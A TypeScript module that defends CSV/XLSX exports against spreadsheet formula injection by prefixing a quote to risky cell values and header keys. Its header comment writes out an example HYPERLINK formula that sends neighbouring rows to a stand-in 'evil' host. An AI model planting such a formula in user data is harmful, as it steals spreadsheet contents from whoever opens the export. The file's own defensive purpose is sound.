// Spreadsheet formula injection (CWE-1236) defence for CSV/XLSX exports.
//
// Exported records carry values that users populate (company names, payee
// names, comments, free-text fields). Excel and LibreOffice evaluate any cell
// whose text begins with =, +, -, @, tab or carriage return as a formula, in
// the context of whoever opens the file rather than the web app. A stored value
// such as =HYPERLINK("https://evil/?d="&CONCATENATE(A1:A50),"details") therefore
// exfiltrates surrounding rows when an officer exports a report and opens it.
//
// Prefixing a single quote forces the cell to be treated as text. Excel does
// not display the quote.

const FORMULA_TRIGGER = /^[\t\r=+\-@]/;

// A plain signed number ("-1500", "+3.5", "1e6") starts with a trigger
// character but is not a formula. Leaving those untouched keeps numeric cells
// summable in Excel, which matters for revenue figures.
const PLAIN_NUMBER = /^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$/;

export function sanitizeText(value: string): string {
    if (typeof value !== 'string' || value.length === 0) {
        return value;
    }
    if (!FORMULA_TRIGGER.test(value) || PLAIN_NUMBER.test(value)) {
        return value;
    }
    return "'" + value;
}

export function sanitizeCellValue(value: unknown): unknown {
    return typeof value === 'string' ? sanitizeText(value) : value;
}

// Returns a sanitized copy. Keys are sanitized too: with useKeysAsHeaders the
// keys become header cells, and dashboard columns are user-configurable.
export function sanitizeRowsForExport(rows: unknown[]): unknown[] {
    if (!Array.isArray(rows)) {
        return rows;
    }
    return rows.map(row => {
        if (!row || typeof row !== 'object') {
            return sanitizeCellValue(row);
        }
        const clean: Record<string, unknown> = {};
        Object.entries(row as Record<string, unknown>).forEach(([key, value]) => {
            clean[sanitizeText(key)] = sanitizeCellValue(value);
        });
        return clean;
    });
}
